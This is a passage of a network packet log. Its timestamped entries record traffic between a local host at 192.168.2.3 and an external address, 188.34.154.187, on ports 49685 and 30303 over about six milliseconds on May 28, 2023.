May 28, 2023 10:46:23.359630108 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359644890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359666109 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359684944 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359699011 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359704971 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359719038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359744072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359755993 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359764099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359798908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359808922 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359818935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359838009 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359854937 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359867096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359875917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359899044 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359920025 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.359962940 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.359982967 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360002995 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360016108 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360023975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360038042 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360044003 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360060930 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360065937 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360084057 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360089064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360105991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360110998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360130072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360131979 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360151052 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360152006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360172987 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360176086 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360193968 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360198975 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360213995 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360233068 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360233068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360254049 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360280991 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360301971 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360343933 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360363960 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360363960 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360392094 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360426903 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360450983 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360476971 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360481024 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360502958 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360541105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360553026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360562086 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360622883 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360666990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360726118 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360769987 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360791922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360826969 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360846043 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360857010 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360888004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.360905886 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.360937119 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361001015 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361047983 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361063004 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361083031 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361104012 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361109018 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361125946 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361131907 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361146927 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361155033 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361181021 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361187935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361205101 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361232996 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361264944 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361285925 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361304998 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361311913 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361330986 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361355066 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361357927 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361388922 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361404896 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361411095 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361432076 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361437082 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361450911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361463070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361486912 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361507893 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361519098 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361567020 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361684084 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361706018 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361726999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361738920 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361758947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361764908 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361788988 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361803055 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361812115 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361824036 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361845016 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361849070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361865997 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361869097 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361887932 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361896038 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361910105 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361917019 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361932039 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361942053 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361954927 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361963034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361975908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.361984968 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.361996889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362010956 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362018108 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362035990 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362039089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362060070 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362062931 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362081051 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362102985 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362102985 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362123966 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362132072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362145901 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362164974 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362165928 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362185955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362199068 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362207890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362241983 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362270117 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362310886 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362354040 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362369061 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362375975 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362396002 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362407923 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362418890 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362432957 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362442017 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362456083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362464905 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362479925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362484932 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362507105 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362508059 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362529993 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362545967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362551928 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362572908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362586975 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362596035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362616062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362628937 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362637997 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362649918 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362684965 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362715006 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362735987 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362755060 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.362771034 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.362806082 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363379955 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363400936 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363420010 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363440990 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363444090 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363461971 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363481998 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363518000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363518953 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363539934 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363559961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363573074 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363583088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363601923 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363621950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363635063 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363642931 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363646984 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363663912 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363683939 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363684893 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363708019 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363723040 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363728046 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363745928 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363749027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363769054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363781929 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363790035 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363821030 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363835096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363845110 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363857031 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363877058 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363883018 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363897085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363907099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363918066 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363930941 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363940001 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363955975 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363960028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.363977909 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.363981962 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364005089 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364007950 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364025116 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364046097 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364047050 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364068031 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364084005 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364089012 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364110947 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364121914 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364130020 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364142895 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364152908 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364172935 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364190102 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364192009 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364213943 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364223003 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364236116 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364248037 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364255905 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364286900 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364288092 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364310980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364324093 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364331007 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364352942 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364366055 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364372969 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364393950 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364396095 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364414930 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364420891 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364435911 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364455938 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364459038 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364480972 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364484072 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364500999 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364521027 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364521980 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364542961 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364557981 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364562988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364583969 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364598989 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364607096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364623070 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364628077 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364649057 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364665985 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364669085 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364689112 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364700079 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364708900 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364723921 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364727974 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364752054 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364761114 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364770889 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364793062 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364797115 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364811897 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364825010 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364831924 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364867926 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364885092 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364900112 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364907026 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364926100 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364938974 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364948988 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364964008 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364969015 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.364991903 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.364996910 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365017891 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365019083 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365040064 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365042925 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365060091 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365072966 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365080118 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365099907 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365108967 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365123034 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365142107 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365144014 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365163088 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365184069 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365184069 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365205050 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365212917 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365226984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365246058 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365247011 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365267038 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365286112 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365288019 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365309000 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365312099 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365329027 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365350962 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365351915 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365371943 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365394115 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365394115 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365415096 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365420103 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365437984 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365458012 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365473032 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365478992 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365499973 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365504026 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365519047 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365535021 CEST	49685	30303	192.168.2.3	188.34.154.187
May 28, 2023 10:46:23.365540028 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365561008 CEST	30303	49685	188.34.154.187	192.168.2.3
May 28, 2023 10:46:23.365565062 CEST	49685	30303	192.168.2.3	188.34.154.187
